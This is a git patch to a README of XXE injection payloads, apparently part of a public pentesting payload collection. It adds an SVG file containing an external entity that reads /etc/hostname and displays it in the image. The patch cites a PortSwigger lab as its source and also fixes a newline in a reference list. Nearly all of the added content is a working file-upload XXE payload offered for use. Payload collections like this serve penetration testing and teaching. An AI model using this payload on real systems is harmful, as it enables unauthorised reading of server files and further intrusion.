From 8822199f654c2b89ca71e682a9d380ba4eacb51f Mon Sep 17 00:00:00 2001
From: Techbrunch <Techbrunch@users.noreply.github.com>
Date: Tue, 17 Sep 2019 16:23:14 +0200
Subject: [PATCH] Add XXE payload inside SVG

Source: https://portswigger.net/web-security/xxe/lab-xxe-via-file-upload
---
 XXE Injection/README.md | 10 +++++++++-
 1 file changed, 9 insertions(+), 1 deletion(-)

diff --git a/XXE Injection/README.md b/XXE Injection/README.md
index b69754c..378c8c2 100644
--- a/XXE Injection/README.md	
+++ b/XXE Injection/README.md	
@@ -298,6 +298,14 @@ Ref. [brianwrf/CVE-2018-11788](https://github.com/brianwrf/CVE-2018-11788)
 </svg>
 ```
 
+```
+<?xml version="1.0" standalone="yes"?>
+<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]>
+<svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
+   <text font-size="16" x="0" y="16">&xxe;</text>
+</svg>
+```
+
 ### XXE inside SOAP
 
 ```xml
@@ -351,4 +359,4 @@ GIF (experimental)
 * [XXE inside SVG](https://quanyang.github.io/x-ctf-finals-2016-john-slick-web-25/)
 * [Pentest XXE - @phonexicum](https://phonexicum.github.io/infosec/xxe.html)
 * [Exploiting XXE with local DTD files - Arseniy Sharoglazov - 12/12/2018](https://mohemiv.com/all/exploiting-xxe-with-local-dtd-files/)
-* [Web Security Academy >> XML external entity (XXE) injection - 2019 PortSwigger Ltd](https://portswigger.net/web-security/xxe)
\ No newline at end of file
+* [Web Security Academy >> XML external entity (XXE) injection - 2019 PortSwigger Ltd](https://portswigger.net/web-security/xxe)